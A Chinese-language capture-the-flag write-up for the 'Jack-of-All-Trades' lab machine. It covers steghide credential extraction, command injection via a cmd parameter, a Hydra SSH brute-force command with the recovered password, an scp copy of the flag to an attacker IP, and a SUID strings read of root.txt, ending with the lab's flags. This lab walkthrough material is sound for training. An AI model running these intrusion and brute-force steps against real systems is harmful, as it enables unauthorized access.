Jack-of-All-Trades
Boot-to-root originally designed for Securi-Tay 2020
0x00 信息收集
正常的用Nmap扫全端口。发现22和80端口对调了。。。感觉这个靶场肯定不太正经。
打开Web服务是22端口发现打不开,可以参照下面链接解决。
正常扫描一波目录,这里发现assets里面有3张图片。用wget下载下来先。
查看主页面源代码,里面有一行注释是base64编码
解码发现有个password
这个recovery.php是个登录页面,用刚刚密码登录发现不对。
然后再登录页面的源代码中有找到了一串base编码的密文。经过解码发现解不开,遂放弃。
回到刚刚wget下来的三张图片上
用steghide info 查看里面是否有文件,再header.jpg中提取到了cms.creds。内容有账号和密码。。
0x01 命令执行
用该账号和密码登录recovery.php成功,进来时个命令执行的页面,用cmd传参
可以成功的执行命令
直接反弹Shell并不成功,尝试执行wget下载反弹shell
执行wget不成功,后来发现时没有写入权限
接着翻找敏感信息,在hom目录下发现有个jacks_password_list文件。根据名字判断是个密码列表。
把密码列表复制到本地
0x02 User Flag
用hydra跑一遍密码,果然登录成功了
hydra -l jack -P pass.txt
ssh://10.10.120.66 -s 80 -f
ITMJpGGIqg1jn?>@
用户的flag是个图片,只能用scp传回到攻击机上查看,获得User Flag
scp user.jpg root@10.10.93.73:/root/user.jpg
0x03 ROOT Flag
查看了sudo权限又查看了crontab定时任务都没有结果,在查看SUID权限的命令中看到了strings
根据
https://gtfobins.github.io/gtfobins/strings/能读取root.txt 获得flag
strings /root/root.txt成功读取到root flag
securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a}